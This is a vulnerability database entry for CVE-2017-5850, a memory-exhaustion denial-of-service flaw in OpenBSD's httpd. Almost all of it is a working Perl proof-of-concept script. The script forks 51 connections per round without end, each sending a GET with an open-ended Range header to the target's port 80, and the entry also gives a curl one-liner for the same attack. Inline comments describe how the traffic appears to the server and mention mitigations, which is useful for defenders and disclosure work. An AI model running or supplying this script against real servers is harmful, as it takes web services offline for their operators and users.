seebug · Root · SSV:92672
History: Feb 10, 2017 - 12:00 a.m.

OpenBSD http server - denial of service vulnerability(CVE-2017-5850)

2017-02-10 00:00:00
Root
www.seebug.org
180

0.019 Low

EPSS

Percentile

88.6%

No description provided by source.


                                                #!/usr/bin/perl -w
# curl --limit-rate 1 --continue-at 1 --header "Host: www.example.com" http://target/10mb.fs

use warnings;
use IO::Socket;
use Parallel::ForkManager;

# Driver section of the CVE-2017-5850 proof of concept.
#
# $numforks is the concurrency ceiling later handed to Parallel::ForkManager
# inside killhttpd. It is left as a package global (no `my`) because
# killhttpd reads it by name.
$numforks = 50;

# Two positional arguments are required: <host> and <remotefile>.
# With fewer, print the usage text and leave with the default exit status.
unless (@ARGV >= 2) {
  usage();
  exit;
}

# No termination condition: rounds repeat until the process is interrupted.
# Each killhttpd call returns only after it has waited for all its children.
for (;;) {
  killhttpd();
}

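# Print the banner and the expected command line to the currently selected
# output handle. Takes no arguments; returns the result of the last print.
sub usage {
  # The "@" must be escaped. Unescaped, Perl interpolates @PierreKimSec as an
  # (empty, undeclared) array inside the double-quoted string, so the author
  # handle silently disappears from the banner.
  print "OpenBSD HTTP Remote Denial of Service (memory exhaustion) - \@PierreKimSec\n";
  print "usage: perl killobsdhttpd.pl <host> <remotefile>\n";
}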

# Run one round of the proof of concept: fork a batch of children, each of
# which opens a TCP connection to $ARGV[0] on port 80, sends a single GET for
# $ARGV[1] with an open-ended byte range, reads one line of the reply and
# exits. The parent returns once every child has been reaped.
#
# Reads the globals $numforks, $ARGV[0] (host) and $ARGV[1] (request target);
# writes the package globals $pm and $p (neither is declared with `my`).
#
# What this looks like on the server side: bursts of near-simultaneous
# connections from one source, each carrying a GET for the same path with
# `Range: bytes=1-` and `Connection: close`, repeating round after round.
# The page attributes the effect to CVE-2017-5850 (memory exhaustion in
# OpenBSD httpd); the server-side mechanism is not shown in this file.
# The vendor fix for that CVE addresses the cause; per-source connection
# limits in front of the server reduce exposure in the meantime.
sub killhttpd {
  print "ATTACKING $ARGV[0] [using $numforks forks]\n";

  # Indirect-object constructor call; equivalent to
  # Parallel::ForkManager->new($numforks). The argument caps how many
  # children may run at the same time.
  $pm = new Parallel::ForkManager($numforks);

  # The range is inclusive, so one round starts $numforks + 1 children
  # (51 with the default of 50), at most $numforks of them concurrently.
  for (0 .. $numforks)
  {
    # start() forks: the parent receives the child's pid (true) and moves to
    # the next iteration; the child receives 0 and falls through to the body.
    my $pid = $pm->start and next;
    # The constructor's result is not checked: if the connection fails, $sock
    # is undef and the print/read below operate on an invalid handle.
    my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                     PeerPort => "80",
                                     Proto    => 'tcp');
    # Both command-line arguments are interpolated into the request verbatim.
    # `Range: bytes=1-` asks for everything from the second byte to the end
    # of the file.
    $p = "GET $ARGV[1] HTTP/1.1\r\nRange: bytes=1-\r\nAccept: */*\r\nHost: $ARGV[0]\r\nConnection: close\r\n\r\n";
    print $sock $p;
    # Reads a single line of the response, then closes without consuming the
    # rest. Core sleep() works in whole seconds, so sleep(0.5) is truncated
    # to 0 and does not pause.
    if (<$sock>) {sleep (0.5); $sock->close();}
    # Ends the child process; nothing after this line runs in the child.
    $pm->finish;
  }
  # Parent only: block until every child of this round has exited.
  $pm->wait_all_children;
}
                              
